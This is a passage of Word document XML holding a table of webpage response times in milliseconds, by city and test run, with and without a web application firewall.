            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D96784E"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6091F750"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5AC9B3FE"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070B01C0"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4C4EDA7F"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08211960" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="26E1D416" w14:textId="77777777" w:rsidTr="001C3F72">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70E0964A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Washington DC, United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72F27E27"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528.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BDEA650"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420.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="079F268E"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434.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F96C0BE"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471.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="556D2AD7" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="581150A6"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2B4FC247"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2DDCECB2"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0F712669"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02DB3109"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2DF4E429" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="78C60F6F" w14:textId="77777777" w:rsidTr="001C3F72">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40921CA5" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Average</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4061B8D0"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538.08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FFBD95A"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535.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BCE5112"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596.96</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="350917A6"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605.16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38DD1BBD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="157DF2BC"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1BD5DE4E"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76BE1F2A"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76BE7D60"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04DCB41B"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21F61666" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="27452787" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="614B00FF"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982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1572113A"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254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="540BA8B3"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981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E53B191"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23" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BD00003"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059D41FE"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7CF96B03"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078B45B5"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04FDEEB9"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1CBBEB01"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703336E3"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77CDA523" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="278B165F" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="30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30A2A9B"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w/o WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11660" w:type="dxa"/>
            <w:gridSpan w:val="11"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58113780" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Webpage Response (ms)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="0104D9D5" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE6116E"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City, Country</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E37776A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50ECD7CD"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="291FB974"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="411A52C9"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29E6B2FA"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126CDF04"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B446C9"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7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="200C7EEA"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6D8E15"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77F08282"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="D9D9D9"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60CBAEFC"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Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001C3F72" w:rsidRPr="001C3F72" w14:paraId="3445B949" w14:textId="77777777" w:rsidTr="001C3F72">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32258384" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Cape Town, South Africa</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="982" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64332F33"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833</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1254" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA6B17A"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661</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="981" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07F34D5F"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672</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BEBE3E5"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680</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43928C60"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666</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="682023F3"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843</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="341022C1"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665</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A121B28"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670</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53A8AD97"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665</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
